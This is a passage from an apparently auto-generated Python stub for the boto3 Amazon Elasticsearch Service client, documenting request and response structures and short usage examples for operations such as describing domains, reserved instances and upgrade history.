'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
},
]
}
**Response Structure**
- *(dict) --*
The result of a ``DescribeElasticsearchDomains`` request. Contains the status of the specified domains or all domains owned by the account.
- **DomainStatusList** *(list) --*
The status of the domains requested in the ``DescribeElasticsearchDomains`` request.
- *(dict) --*
The current status of an Elasticsearch domain.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon resource name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to the number of subnets if VPC endpoints are enabled.
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions``
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions``
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service, and can be useful for troubleshooting.
- *(dict) --*
Log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update your service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version update.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainNames: list
:param DomainNames: **[REQUIRED]**
The Elasticsearch domains for which you want information.
- *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:rtype: dict
:returns:
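**Example**
A minimal usage sketch; the domain name ``my-domain`` is a hypothetical placeholder:
::
import boto3
client = boto3.client('es')
response = client.describe_elasticsearch_domains(DomainNames=['my-domain'])
for domain in response['DomainStatusList']:
    # Each entry is the current status of one requested domain
    print(domain['DomainName'], domain['ARN'])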
"""
pass
def describe_elasticsearch_instance_type_limits(self, InstanceType: str, ElasticsearchVersion: str, DomainName: str = None) -> Dict:
"""
Describes the Elasticsearch Limits for a given InstanceType and ElasticsearchVersion. When modifying an existing domain, specify the `` DomainName `` to learn which Limits apply to that modification.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchInstanceTypeLimits>`_
**Request Syntax**
::
response = client.describe_elasticsearch_instance_type_limits(
DomainName='string',
InstanceType='m3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
ElasticsearchVersion='string'
)
**Response Syntax**
::
{
'LimitsByRole': {
'string': {
'StorageTypes': [
{
'StorageTypeName': 'string',
'StorageSubTypeName': 'string',
'StorageTypeLimits': [
{
'LimitName': 'string',
'LimitValues': [
'string',
]
},
]
},
],
'InstanceLimits': {
'InstanceCountLimits': {
'MinimumInstanceCount': 123,
'MaximumInstanceCount': 123
}
},
'AdditionalLimits': [
{
'LimitName': 'string',
'LimitValues': [
'string',
]
},
]
}
}
}
**Response Structure**
- *(dict) --*
Container for the parameters received from `` DescribeElasticsearchInstanceTypeLimits `` operation.
- **LimitsByRole** *(dict) --*
Map of the role of the instance and the limits that are applicable. The role performed by a given instance in Elasticsearch can be one of the following:
* Data: if the given InstanceType is used as a data node
* Master: if the given InstanceType is used as a master node
- *(string) --*
- *(dict) --*
Limits for the given InstanceType and for each of its roles. Limits contains the following: `` StorageTypes ``, `` InstanceLimits ``, and `` AdditionalLimits ``.
- **StorageTypes** *(list) --*
StorageType represents the list of storage-related types and attributes that are available for the given InstanceType.
- *(dict) --*
StorageTypes represents the list of storage-related types and their attributes that are available for the given InstanceType.
- **StorageTypeName** *(string) --*
Type of the storage. List of available storage options:
* instance
Built-in storage available for the given instance
* ebs
Elastic Block Storage that would be attached to the given instance
- **StorageSubTypeName** *(string) --*
Subtype of the given storage type. For the "instance" storage type there is no storage subtype; for the "ebs" storage type the following subtypes are valid:
* standard
* gp2
* io1
Refer to `` VolumeType `` for more information about the above EBS storage options.
- **StorageTypeLimits** *(list) --*
List of limits that are applicable for the given storage type.
- *(dict) --*
Limits that are applicable for the given storage type.
- **LimitName** *(string) --*
Name of a storage limit that is applicable for the given storage type. If `` StorageType `` is ebs, the following storage options are applicable:
* MinimumVolumeSize
Minimum amount of volume size that is applicable for the given storage type. It can be empty if it is not applicable.
* MaximumVolumeSize
Maximum amount of volume size that is applicable for the given storage type. It can be empty if it is not applicable.
* MaximumIops
Maximum amount of Iops that is applicable for the given storage type. It can be empty if it is not applicable.
* MinimumIops
Minimum amount of Iops that is applicable for the given storage type. It can be empty if it is not applicable.
- **LimitValues** *(list) --*
Values for the `` StorageTypeLimit$LimitName `` .
- *(string) --*
- **InstanceLimits** *(dict) --*
InstanceLimits represents the list of instance-related attributes that are available for the given InstanceType.
- **InstanceCountLimits** *(dict) --*
InstanceCountLimits represents the limits on the number of instances that can be created in Amazon Elasticsearch for the given InstanceType.
- **MinimumInstanceCount** *(integer) --*
Minimum number of instances that can be instantiated for the given InstanceType.
- **MaximumInstanceCount** *(integer) --*
Maximum number of instances that can be instantiated for the given InstanceType.
- **AdditionalLimits** *(list) --*
List of additional limits that are specific to a given InstanceType and for each of its `` InstanceRole `` .
- *(dict) --*
List of limits that are specific to a given InstanceType and for each of its `` InstanceRole `` .
- **LimitName** *(string) --*
Name of an additional limit that is specific to a given InstanceType and each of its `` InstanceRole `` . Attributes and their details:
* MaximumNumberOfDataNodesSupported
This attribute is present only for master nodes and specifies the maximum number of data nodes that the given `` ESPartitionInstanceType `` can support as a master node.
* MaximumNumberOfDataNodesWithoutMasterNode
This attribute is present only for data nodes and specifies the maximum number of data nodes of the given `` ESPartitionInstanceType `` that can run without any master nodes to govern them.
- **LimitValues** *(list) --*
Value for the given `` AdditionalLimit$LimitName `` .
- *(string) --*
:type DomainName: string
:param DomainName:
DomainName represents the name of the domain that you are trying to modify. This should be present only if you are querying for the Elasticsearch `` Limits `` of an existing domain.
:type InstanceType: string
:param InstanceType: **[REQUIRED]**
The instance type for an Elasticsearch cluster for which Elasticsearch `` Limits `` are needed.
:type ElasticsearchVersion: string
:param ElasticsearchVersion: **[REQUIRED]**
Version of Elasticsearch for which `` Limits `` are needed.
:rtype: dict
:returns:
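**Example**
A minimal usage sketch; the instance type is taken from the enum above and the version string ``'6.3'`` is an illustrative value:
::
import boto3
client = boto3.client('es')
response = client.describe_elasticsearch_instance_type_limits(
    InstanceType='m4.large.elasticsearch',
    ElasticsearchVersion='6.3')
# LimitsByRole maps each instance role to its applicable limits
for role, limits in response['LimitsByRole'].items():
    counts = limits['InstanceLimits']['InstanceCountLimits']
    print(role, counts['MinimumInstanceCount'], counts['MaximumInstanceCount'])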
"""
pass
def describe_reserved_elasticsearch_instance_offerings(self, ReservedElasticsearchInstanceOfferingId: str = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists available reserved Elasticsearch instance offerings.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeReservedElasticsearchInstanceOfferings>`_
**Request Syntax**
::
response = client.describe_reserved_elasticsearch_instance_offerings(
ReservedElasticsearchInstanceOfferingId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'NextToken': 'string',
'ReservedElasticsearchInstanceOfferings': [
{
'ReservedElasticsearchInstanceOfferingId': 'string',
'ElasticsearchInstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'Duration': 123,
'FixedPrice': 123.0,
'UsagePrice': 123.0,
'CurrencyCode': 'string',
'PaymentOption': 'ALL_UPFRONT'|'PARTIAL_UPFRONT'|'NO_UPFRONT',
'RecurringCharges': [
{
'RecurringChargeAmount': 123.0,
'RecurringChargeFrequency': 'string'
},
]
},
]
}
**Response Structure**
- *(dict) --*
Container for results from ``DescribeReservedElasticsearchInstanceOfferings``
- **NextToken** *(string) --*
Provides an identifier to allow retrieval of paginated results.
- **ReservedElasticsearchInstanceOfferings** *(list) --*
List of reserved Elasticsearch instance offerings
- *(dict) --*
Details of a reserved Elasticsearch instance offering.
- **ReservedElasticsearchInstanceOfferingId** *(string) --*
The Elasticsearch reserved instance offering identifier.
- **ElasticsearchInstanceType** *(string) --*
The Elasticsearch instance type offered by the reserved instance offering.
- **Duration** *(integer) --*
The duration, in seconds, for which the offering will reserve the Elasticsearch instance.
- **FixedPrice** *(float) --*
The upfront fixed charge you will pay to purchase the specific reserved Elasticsearch instance offering.
- **UsagePrice** *(float) --*
The rate you are charged for each hour the domain that is using the offering is running.
- **CurrencyCode** *(string) --*
The currency code for the reserved Elasticsearch instance offering.
- **PaymentOption** *(string) --*
Payment option for the reserved Elasticsearch instance offering
- **RecurringCharges** *(list) --*
The charge to your account regardless of whether you are creating any domains using the instance offering.
- *(dict) --*
Contains the specific price and frequency of a recurring charge for a reserved Elasticsearch instance, or for a reserved Elasticsearch instance offering.
- **RecurringChargeAmount** *(float) --*
The monetary amount of the recurring charge.
- **RecurringChargeFrequency** *(string) --*
The frequency of the recurring charge.
:type ReservedElasticsearchInstanceOfferingId: string
:param ReservedElasticsearchInstanceOfferingId:
The offering identifier filter value. Use this parameter to show only the available offering that matches the specified reservation identifier.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. If not specified, defaults to 100.
:type NextToken: string
:param NextToken:
NextToken should be sent if an earlier API call produced a result containing NextToken. It is used for pagination.
:rtype: dict
:returns:
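**Example**
A minimal usage sketch listing the first page of offerings:
::
import boto3
client = boto3.client('es')
response = client.describe_reserved_elasticsearch_instance_offerings(MaxResults=50)
for offering in response['ReservedElasticsearchInstanceOfferings']:
    # Each entry describes one purchasable reservation offering
    print(offering['ReservedElasticsearchInstanceOfferingId'],
          offering['ElasticsearchInstanceType'],
          offering['PaymentOption'])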
"""
pass
def describe_reserved_elasticsearch_instances(self, ReservedElasticsearchInstanceId: str = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Returns information about reserved Elasticsearch instances for this account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeReservedElasticsearchInstances>`_
**Request Syntax**
::
response = client.describe_reserved_elasticsearch_instances(
ReservedElasticsearchInstanceId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'NextToken': 'string',
'ReservedElasticsearchInstances': [
{
'ReservationName': 'string',
'ReservedElasticsearchInstanceId': 'string',
'ReservedElasticsearchInstanceOfferingId': 'string',
'ElasticsearchInstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'StartTime': datetime(2015, 1, 1),
'Duration': 123,
'FixedPrice': 123.0,
'UsagePrice': 123.0,
'CurrencyCode': 'string',
'ElasticsearchInstanceCount': 123,
'State': 'string',
'PaymentOption': 'ALL_UPFRONT'|'PARTIAL_UPFRONT'|'NO_UPFRONT',
'RecurringCharges': [
{
'RecurringChargeAmount': 123.0,
'RecurringChargeFrequency': 'string'
},
]
},
]
}
**Response Structure**
- *(dict) --*
Container for results from ``DescribeReservedElasticsearchInstances``
- **NextToken** *(string) --*
Provides an identifier to allow retrieval of paginated results.
- **ReservedElasticsearchInstances** *(list) --*
List of reserved Elasticsearch instances.
- *(dict) --*
Details of a reserved Elasticsearch instance.
- **ReservationName** *(string) --*
The customer-specified identifier to track this reservation.
- **ReservedElasticsearchInstanceId** *(string) --*
The unique identifier for the reservation.
- **ReservedElasticsearchInstanceOfferingId** *(string) --*
The offering identifier.
- **ElasticsearchInstanceType** *(string) --*
The Elasticsearch instance type offered by the reserved instance offering.
- **StartTime** *(datetime) --*
The time the reservation started.
- **Duration** *(integer) --*
The duration, in seconds, for which the Elasticsearch instance is reserved.
- **FixedPrice** *(float) --*
The upfront fixed charge you will pay to purchase the specific reserved Elasticsearch instance offering.
- **UsagePrice** *(float) --*
The rate you are charged for each hour for the domain that is using this reserved instance.
- **CurrencyCode** *(string) --*
The currency code for the reserved Elasticsearch instance offering.
- **ElasticsearchInstanceCount** *(integer) --*
The number of Elasticsearch instances that have been reserved.
- **State** *(string) --*
The state of the reserved Elasticsearch instance.
- **PaymentOption** *(string) --*
The payment option as defined in the reserved Elasticsearch instance offering.
- **RecurringCharges** *(list) --*
The charge to your account regardless of whether you are creating any domains using the instance offering.
- *(dict) --*
Contains the specific price and frequency of a recurring charge for a reserved Elasticsearch instance, or for a reserved Elasticsearch instance offering.
- **RecurringChargeAmount** *(float) --*
The monetary amount of the recurring charge.
- **RecurringChargeFrequency** *(string) --*
The frequency of the recurring charge.
:type ReservedElasticsearchInstanceId: string
:param ReservedElasticsearchInstanceId:
The reserved instance identifier filter value. Use this parameter to show only the reservation that matches the specified reserved Elasticsearch instance ID.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. If not specified, defaults to 100.
:type NextToken: string
:param NextToken:
NextToken should be sent if an earlier API call produced a result containing NextToken. It is used for pagination.
:rtype: dict
:returns:
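**Example**
A minimal sketch of manual pagination with ``NextToken``:
::
import boto3
client = boto3.client('es')
kwargs = {}
while True:
    page = client.describe_reserved_elasticsearch_instances(**kwargs)
    for reservation in page.get('ReservedElasticsearchInstances', []):
        print(reservation['ReservationName'], reservation['State'])
    # Stop once the service no longer returns a pagination token
    if 'NextToken' not in page:
        break
    kwargs['NextToken'] = page['NextToken']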
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
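**Example**
A minimal sketch; presigning works the same way on every botocore-based client. ``list_domain_names`` is used here because it takes no parameters, so ``Params`` can be omitted:
::
import boto3
client = boto3.client('es')
# The URL is valid for 5 minutes and can be shared without credentials
url = client.generate_presigned_url(ClientMethod='list_domain_names', ExpiresIn=300)
print(url)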
"""
pass
def get_compatible_elasticsearch_versions(self, DomainName: str = None) -> Dict:
"""
Returns a list of upgrade-compatible Elasticsearch versions. You can optionally pass a `` DomainName `` to get all upgrade-compatible Elasticsearch versions for that specific domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/GetCompatibleElasticsearchVersions>`_
**Request Syntax**
::
response = client.get_compatible_elasticsearch_versions(
DomainName='string'
)
**Response Syntax**
::
{
'CompatibleElasticsearchVersions': [
{
'SourceVersion': 'string',
'TargetVersions': [
'string',
]
},
]
}
**Response Structure**
- *(dict) --*
Container for response returned by `` GetCompatibleElasticsearchVersions `` operation.
- **CompatibleElasticsearchVersions** *(list) --*
A map of compatible Elasticsearch versions returned as part of the `` GetCompatibleElasticsearchVersions `` operation.
- *(dict) --*
A map from an `` ElasticsearchVersion `` to a list of compatible `` ElasticsearchVersion `` s to which the domain can be upgraded.
- **SourceVersion** *(string) --*
The current version of Elasticsearch on which the domain is running.
- **TargetVersions** *(list) --*
List of supported Elasticsearch versions.
- *(string) --*
:type DomainName: string
:param DomainName:
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:rtype: dict
:returns:
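**Example**
A minimal usage sketch; omitting ``DomainName`` returns the full compatibility map:
::
import boto3
client = boto3.client('es')
response = client.get_compatible_elasticsearch_versions()
for entry in response['CompatibleElasticsearchVersions']:
    # Each entry maps a source version to its valid upgrade targets
    print(entry['SourceVersion'], '->', entry['TargetVersions'])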
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
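**Example**
A minimal sketch, assuming the ``describe_reserved_elasticsearch_instance_offerings`` operation is pageable on this client:
::
import boto3
client = boto3.client('es')
paginator = client.get_paginator('describe_reserved_elasticsearch_instance_offerings')
# The paginator handles NextToken bookkeeping automatically
for page in paginator.paginate():
    for offering in page['ReservedElasticsearchInstanceOfferings']:
        print(offering['ReservedElasticsearchInstanceOfferingId'])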
"""
pass
def get_upgrade_history(self, DomainName: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Retrieves the complete history of the last 10 upgrades that were performed on the domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/GetUpgradeHistory>`_
**Request Syntax**
::
response = client.get_upgrade_history(
DomainName='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'UpgradeHistories': [
{
'UpgradeName': 'string',
'StartTimestamp': datetime(2015, 1, 1),
'UpgradeStatus': 'IN_PROGRESS'|'SUCCEEDED'|'SUCCEEDED_WITH_ISSUES'|'FAILED',
'StepsList': [
{
'UpgradeStep': 'PRE_UPGRADE_CHECK'|'SNAPSHOT'|'UPGRADE',
'UpgradeStepStatus': 'IN_PROGRESS'|'SUCCEEDED'|'SUCCEEDED_WITH_ISSUES'|'FAILED',
'Issues': [
'string',
],
'ProgressPercent': 123.0
},
]
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Container for response returned by `` GetUpgradeHistory `` operation.
- **UpgradeHistories** *(list) --*
A list of `` UpgradeHistory `` objects corresponding to each Upgrade or Upgrade Eligibility Check performed on a domain, returned as part of the `` GetUpgradeHistoryResponse `` object.
- *(dict) --*
History of the last 10 Upgrades and Upgrade Eligibility Checks.
- **UpgradeName** *(string) --*
A string that describes the update briefly.
- **StartTimestamp** *(datetime) --*
UTC Timestamp at which the Upgrade API call was made in "yyyy-MM-ddTHH:mm:ssZ" format.
- **UpgradeStatus** *(string) --*
The overall status of the update. The status can take one of the following values:
* In Progress
* Succeeded
* Succeeded with Issues
* Failed
- **StepsList** *(list) --*
A list of `` UpgradeStepItem `` s representing information about each step performed as part of a specific Upgrade or Upgrade Eligibility Check.
- *(dict) --*
Represents a single step of the Upgrade or Upgrade Eligibility Check workflow.
- **UpgradeStep** *(string) --*
Represents one of 3 steps that an Upgrade or Upgrade Eligibility Check goes through:
* PreUpgradeCheck
* Snapshot
* Upgrade
- **UpgradeStepStatus** *(string) --*
The status of a particular step during an upgrade. The status can take one of the following values:
* In Progress
* Succeeded
* Succeeded with Issues
* Failed
- **Issues** *(list) --*
A list of strings containing detailed information about the errors encountered in a particular step.
- *(string) --*
- **ProgressPercent** *(float) --*
The floating-point value representing the progress percentage of a particular step.
- **NextToken** *(string) --*
Pagination token that needs to be supplied to the next call to get the next page of results.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned.
:type NextToken: string
:param NextToken:
Paginated APIs accept a NextToken input to return results for the next page, and provide a NextToken output in the response, which the client can use to retrieve more results.
:rtype: dict
:returns:
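**Example**
A minimal usage sketch; ``my-domain`` is a hypothetical placeholder:
::
import boto3
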